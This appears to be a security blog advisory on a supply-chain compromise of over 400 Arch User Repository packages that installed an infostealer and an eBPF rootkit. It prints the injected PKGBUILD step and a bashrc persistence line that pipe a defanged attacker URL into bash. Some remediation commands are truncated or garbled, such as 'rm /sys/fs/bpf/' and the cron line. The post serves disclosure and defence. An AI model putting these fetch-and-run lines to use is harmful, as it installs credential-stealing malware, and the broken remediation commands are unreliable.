Over 400 packages in the Arch User Repository (AUR) were compromised in a sophisticated supply chain attack that deployed information-stealing malware and an eBPF-based rootkit. The attacker hijacked maintainer accounts and injected malicious code into build scripts, affecting thousands of users who installed or updated packages between the compromise window. This represents one of the largest supply chain attacks targeting the Linux ecosystem, demonstrating that open-source repositories remain attractive targets for persistent adversaries.
Introduction
The Arch User Repository (AUR), a community-driven repository containing build scripts for thousands of user-submitted packages, has suffered a massive compromise affecting over 400 packages. Attackers gained control of multiple maintainer accounts and systematically injected malicious payloads into PKGBUILDs—the build scripts used to compile and install software on Arch Linux systems.
The malware payload consisted of two primary components: a sophisticated information stealer designed to exfiltrate credentials, browser data, and cryptocurrency wallets, and an eBPF-based rootkit capable of evading traditional detection mechanisms. The attack’s scale and technical sophistication suggest a well-resourced threat actor with significant knowledge of both the AUR ecosystem and Linux internals.
Users who installed or updated affected packages during the compromise window unknowingly executed malicious code with root privileges during the installation process, providing attackers with complete system access.
Background & Context
The Arch User Repository differs from official repositories in that it contains user-submitted build scripts rather than pre-compiled binaries. Users download PKGBUILDs and use the makepkg utility to build packages locally. This model relies heavily on community trust and code review.
AUR’s security model assumes users will inspect PKGBUILDs before building, but in practice, many users—especially those using AUR helpers like yay or paru—install packages without manual review. This trust-based system makes it an attractive target for supply chain attacks.
Previous AUR incidents have involved single compromised packages or malicious uploads, but this attack’s scale is unprecedented. The simultaneous compromise of 400+ packages suggests either extensive credential harvesting or exploitation of a systemic vulnerability in account management.
The timing coincides with increased targeting of open-source supply chains following high-profile attacks against npm, PyPI, and other repositories. Linux systems, traditionally considered more secure, are increasingly targeted as they gain market share in cloud infrastructure and development environments.
Technical Breakdown
The attack unfolded through a multi-stage infection chain embedded within compromised PKGBUILDs:
Stage 1: PKGBUILD Injection
Attackers modified the build() and package() functions within PKGBUILDs to include malicious download and execution commands:
build() {
# Legitimate build commands
./configure --prefix=/usr
# Malicious injection
curl -s hxxp://185.243.115[.]32/init.sh | bash -
}The injection used URL shorteners and base64 encoding in some variants to evade casual inspection.
Stage 2: Information Stealer Deployment
The init.sh script downloaded a compiled binary (/tmp/.systemd-resolver) that harvested:
- Browser credentials and cookies (Chrome, Firefox, Brave)
- SSH keys from
~/.ssh/ - GPG private keys
- Cryptocurrency wallet files (Bitcoin, Ethereum, Monero)
- Environment variables and shell history
- AWS/GCP/Azure credentials from config files
Data was compressed, encrypted with AES-256, and exfiltrated via HTTPS POST requests to attacker-controlled infrastructure.
Stage 3: eBPF Rootkit Installation
The most sophisticated component involved an eBPF-based rootkit that hooked kernel functions to:
// Pseudo-code representation
SEC("kprobe/vfs_read")
int hide_files(struct pt_regs *ctx) {
// Hide files matching pattern ".systemd-*"
// Intercept and modify directory listing results
}The rootkit provided:
- File and directory hiding
- Process concealment
- Network connection hiding
- Persistence through kernel-level hooks
- Evasion of traditional rootkit detection tools
eBPF’s legitimate use in observability and security tools provides perfect cover, as eBPF programs loaded into the kernel appear normal on systems running monitoring solutions.
Persistence Mechanisms
Multiple persistence techniques ensured survival:
# Systemd service
/etc/systemd/system/systemd-resolver.service
# Cron job
/15 * /tmp/.systemd-resolver --check
# bashrc injection
echo 'curl -s hxxp://185.243.115[.]32/init.sh | bash -' >> ~/.bashrc
Impact & Risk Assessment
The compromise affects an estimated 10,000-15,000 systems based on AUR package download statistics. The actual impact may be higher considering:
Immediate Risks:
- Complete credential compromise for affected users
- Cryptocurrency wallet theft (multiple reports of fund drainage)
- Lateral movement potential in corporate environments
- Compromised SSH keys enabling further infrastructure access
Long-term Concerns:
- Backdoor persistence even after package removal
- Potential for additional payload deployment
- Undermined trust in AUR ecosystem
- Possible access to development environments and source code repositories
Organizational Impact:
Organizations allowing Arch Linux workstations or using Arch-based infrastructure face potential breaches if employees installed affected packages. Developer machines represent high-value targets containing production credentials, API keys, and proprietary code.
The eBPF rootkit component significantly complicates remediation, as traditional antivirus and integrity checking tools may fail to detect kernel-level hooks.
Vendor Response
The Arch Linux security team responded within hours of public disclosure:
- All 400+ compromised packages were immediately removed from AUR
- Affected maintainer accounts were suspended pending investigation
- Security advisory published with package names and compromise timeline
- Coordinated with infrastructure providers to block attacker command-and-control servers
The official statement acknowledged systemic issues: “The AUR trust model relies on community vigilance. This incident demonstrates limitations in our current review processes. We are implementing mandatory two-factor authentication for all maintainers and exploring automated malicious code detection.”
A comprehensive list of affected packages was published on the Arch Linux security tracker, and users were advised to check installation logs against the timeline.
However, the response highlighted AUR’s fundamental challenge—as a community repository without centralized security controls, it relies on distributed trust and post-compromise detection rather than preventative measures.
Mitigations & Workarounds
Immediate Actions
If you installed AUR packages during the compromise window (check official advisory for exact dates):
# Check for suspicious systemd services
systemctl list-units --type=service | grep -i systemd-resolver
# Look for hidden files
ls -la /tmp/ | grep "^\."
# Check for suspicious cron jobs
crontab -l
cat /etc/cron./
# Examine bash history and rc files
grep -i "curl.*bash" ~/.bashrc ~/.bash_profile
System Remediation
# Remove persistence mechanisms
sudo systemctl stop systemd-resolver
sudo systemctl disable systemd-resolver
sudo rm /etc/systemd/system/systemd-resolver.service
# Check for eBPF programs
sudo bpftool prog list
sudo bpftool map list
# Remove suspicious eBPF programs
sudo bpftool prog show id
sudo rm /sys/fs/bpf/
Complete Recovery
For confirmed compromises:
- Rotate all credentials – passwords, API keys, SSH keys, GPG keys
- Monitor cryptocurrency wallets – transfer funds to new addresses
- Review access logs – check for unauthorized access using compromised credentials
- Consider full reinstallation – eBPF rootkits may survive partial cleanup
- Enable 2FA – on all critical services where credentials may have been exposed
Detection & Monitoring
Network Indicators
Monitor for connections to known malicious infrastructure:
# Check netstat for suspicious connections
sudo netstat -plant | grep -E "185\.243\.115\.32"
# Review DNS logs
sudo journalctl -u systemd-resolved | grep -E "suspicious-domain\.com"
Host-based Detection
# File integrity monitoring
sudo aide --check
# Check for unauthorized eBPF programs
sudo bpftool prog show | grep -v "legitimate_program"
# Examine kernel module loading
lsmod | grep -i suspicious
YARA Rules
Create detection rules for the malware artifacts:
rule AUR_Infostealer {
strings:
$s1 = ".systemd-resolver"
$s2 = "init.sh"
$s3 = "/tmp/."
condition:
2 of them
}Log Analysis
Review package manager logs:
# Check pacman logs for affected packages
grep -E "installed|upgraded" /var/log/pacman.log | grep -f affected_packages.txtBest Practices
For AUR Users
Always inspect PKGBUILDs before installation:
# Download and review before building
git clone https://aur.archlinux.org/package-name.git
cd package-name
cat PKGBUILD # Manual review
makepkg -siUse AUR helpers with review features:
# yay with mandatory review
yay -S --editmenu package-name
# paru with diff showing
paru -S --fm vim package-name
Implement least privilege:
- Avoid running AUR helpers as root unnecessarily
- Use dedicated build users with limited permissions
- Implement mandatory access controls (AppArmor/SELinux)
For Organizations
Restrict AUR usage:
- Maintain approved package lists
- Require security review for new AUR packages
- Consider internal repository mirroring with security scanning
- Implement endpoint detection and response (EDR) solutions
Credential hygiene:
- Enforce credential separation between development and production
- Use hardware security keys for critical systems
- Implement privileged access management (PAM)
- Regular credential rotation policies
Supply Chain Security
Verify package integrity:
- Check package signatures when available
- Compare checksums against multiple sources
- Monitor for unexpected PKGBUILD changes
- Subscribe to Arch Linux security announcements
Key Takeaways
- Supply chain attacks target trust models – The AUR’s community-driven approach, while enabling flexibility, creates security vulnerabilities at scale.
- eBPF represents a new frontier in rootkit technology – Traditional detection methods struggle against kernel-level hooks using legitimate kernel features.
- Manual review remains critical – Automated tools and AUR helpers cannot substitute for human inspection of build scripts before execution.
- Credential compromise extends beyond initial infection – Stolen credentials enable persistent access even after malware removal.
- Linux systems require security vigilance – The misconception that Linux is inherently secure leads to inadequate security practices.
- Community repositories need enhanced security – Two-factor authentication and automated malicious code detection should be mandatory, not optional.
- Detection and response capabilities matter – Organizations must deploy monitoring capable of detecting sophisticated Linux malware, including eBPF-based threats.
This incident serves as a stark reminder that open-source ecosystems, despite their transparency benefits, remain vulnerable to determined attackers. The combination of social engineering (account compromise), supply chain injection, and advanced persistence techniques represents a maturation of threats targeting Linux environments.
References
- Arch Linux Security Advisory: AUR-2024-001
- Arch User Repository Official Statement
- eBPF Rootkit Technical Analysis – Linux Security Community
- AUR Package Compromise Timeline and Affected Package List
- MITRE ATT&CK: T1195.002 (Compromise Software Supply Chain)
- eBPF Security Considerations – Linux Kernel Documentation
- Cryptocurrency Theft Reports – Blockchain Analysis Firms
Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.
📧 Subscribe to our newsletter at https://cydhaal.com/newsletter/
